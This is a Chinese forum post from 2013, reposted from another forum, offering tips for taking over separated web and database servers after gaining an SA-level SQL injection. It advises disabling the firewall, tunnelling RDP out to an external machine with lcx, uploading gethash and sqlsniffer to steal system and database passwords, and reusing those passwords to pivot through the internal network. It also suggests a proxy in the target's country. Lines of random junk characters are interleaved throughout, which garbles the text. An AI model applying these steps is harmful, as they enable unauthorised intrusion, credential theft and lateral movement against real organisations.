当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。% S3 }7 o3 t3 ~
- s6 o6 u$ o4 C) T( I
/ Z6 R' O7 P* Z9 _
# L# U% u3 |" y
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出), D6 }+ F6 U( |7 h' D( a4 E- B
+ F: t1 ^5 s" f/ ^. M# N' V
# Y3 E' A4 w3 a4 {8 g一、DB机有公网IP.
: U( @! K% ]* z* V$ l6 O+ f6 ~
- R( i5 [* E7 L8 Z* O+ {) S5 ]1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.2 o" o0 R) |) A, [, m6 G
2 m" |1 l# n7 d! p2 F
8 O, c) s# l6 i5 |7 \9 m
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
% P0 N: a. F$ S5 I, |! L9 F# P
/ `% j7 B3 w, j
9 h0 u; ^% [' s- \ U& [/ g; b+ r3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
4 \1 K/ p$ ^2 }% q5 r( q( ~. b) w8 x, h) K; N2 E7 O. e+ z! C
3 ~, }/ @' p9 G, a9 \1 i4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用. c# V3 q) P# Q* |. N4 O
6 ` ?1 _' u- K& ~2 R; i6 c& K6 d8 ~- ~
, |% F1 C. N$ ^4 s二、DB机只有内网IP5 _0 e% q" Q& z. k& t0 G
+ c/ Q& B5 s5 o8 i' z/ v3 E" R1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
, Z& B6 Q( S- k5 A; D% W. a8 e* A2 f1 q1 R4 a
2 \2 c: Y7 q( l, u2:停掉防火墙和IP策略再从内往外扫描.. ^% a' _- ^! q) J) i* E- R$ R
% |( v$ H; d- J& n# m+ e/ B( g
6 |0 x V! v/ A0 @# H/ N3 `3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的., P# g* z8 G) u% z9 P7 V Z2 O
* k5 X, w$ r O$ V) ?; h$ f6 m# y$ }% h5 J$ T {: X9 U# d0 k' i# ^
4:学会密码规律分析往往会有惊喜.0 y7 i1 P+ P& ^, Y; g
! [3 D6 i- m+ S2 z7 y
7 V7 B: c/ Y- @
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
9 }5 D, L8 E" e* f! Z3 k
2 A) q _* Z' }: s& c
\. A }) `1 r( C2 K有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对